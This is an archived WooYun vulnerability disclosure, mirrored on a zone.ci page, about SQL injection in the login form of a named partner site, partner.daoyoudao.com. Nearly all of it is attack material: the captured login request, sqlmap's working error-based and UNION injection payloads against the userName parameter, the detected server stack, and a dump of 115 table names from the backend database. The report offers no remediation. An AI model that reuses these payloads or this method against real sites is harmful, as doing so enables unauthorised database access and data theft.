乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-11: 细节已通知厂商并且等待厂商处理中 2016-01-16: 厂商已经主动忽略漏洞,细节向公众公开
POST /lg_login.do HTTP/1.1Content-Length: 153Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://partner.daoyoudao.comCookie: JSESSIONID=E529A57F68C85A32A8EC17315605BEEDHost: partner.daoyoudao.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*userName=1&userPass=
sqlmap resumed the following injection point(s) from stored session:---Parameter: userName (POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: userName=1' AND (SELECT 9788 FROM(SELECT COUNT(*),CONCAT(0x716a707171,(SELECT (ELT(9788=9788,1))),0x716b767171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'FElK'='FElK&userPass= Type: UNION query Title: Generic UNION query (NULL) - 17 columns Payload: userName=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a707171,0x47585452437361727774,0x716b767171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &userPass=---web application technology: Nginx, JSPback-end DBMS: MySQL 5.0Database: channel[115 tables]+------------------------------------+| BusinessName || E_partner_organization || MD_office_plan || Menu || MenuOlder || Menu_20130722 || Micputer || OtherOrderDetail || Role || RoleToMenu || RoleToMicputer || TMP_invoice_init || UserToRole || Verify || User || accountingStatement || accountingStatic || accountingStatic_20150206_tiger || accountingStatic_copy || ad_area || ad_city || ad_province || advice || analysisAccount || angentSale || angentSale_copy || appChangeLog || appcenter || appendOrder || backOrder || c3p0testtable || cancelOrder || cancelToPay || channelBaseInfo || channelBillDetail || channelInfo || clientInfo || courseReservation || course_info_for_partner || deduction || dic_base_info || docnottype || document_notice || document_notice_1107 || document_notice_detail || document_notice_detail_1107 || downloadAddressLog || engineer || fundsFlowManagement || fundsFlowManagement_20150206_tiger || fundsFlowManagement_copy_20150205 || goodsInformation || goodsPromotionInformation || ilive_conf || ilive_product || invoiceInfo || invoiceRecord || iosAccount || lecturerAccounts || lecturerAppointment || lecturerAppointment_copy || lecturerAppointment_copy1 || lecturerInformation || lecturerResource || log_cid10 || maildetail || meetingPlaces || monthBill || monthBillDetail || orderClass || orderDetail || orderDetail_20150206_tiger || orderMessage || orderRecord || orderStatusManagement || orderStatusManagement_android || orderdetail_ad || orderdetail_ilve || orderdetail_sp_split || otherBusinessRebates || p_Belong || p_Belong_copy || p_workOrder || partnerPrice || partnerSystemPackage || payInfo || payMent || payMent_0822 || payMent_20140725 || planSale || production || publish_manage || quarterDetails || quarterPlan || returnMent || rewardMoney || scheduleMaintenance || settingLecturerAccounts || specialconf || specialconf_140805 || sys_city || sys_city_0814 || sys_product || sys_product_case || sys_sellorg || sys_user || sys_user_1009 || tenantInfo || tenantInfo_141110 || trainDemand || trainingAffiliated || trainingApplication || trainingBack || userToNotice || user_menu |+------------------------------------+
危害等级:无影响厂商忽略
忽略时间:2016-01-16 11:44
漏洞Rank:4 (WooYun评价)
暂无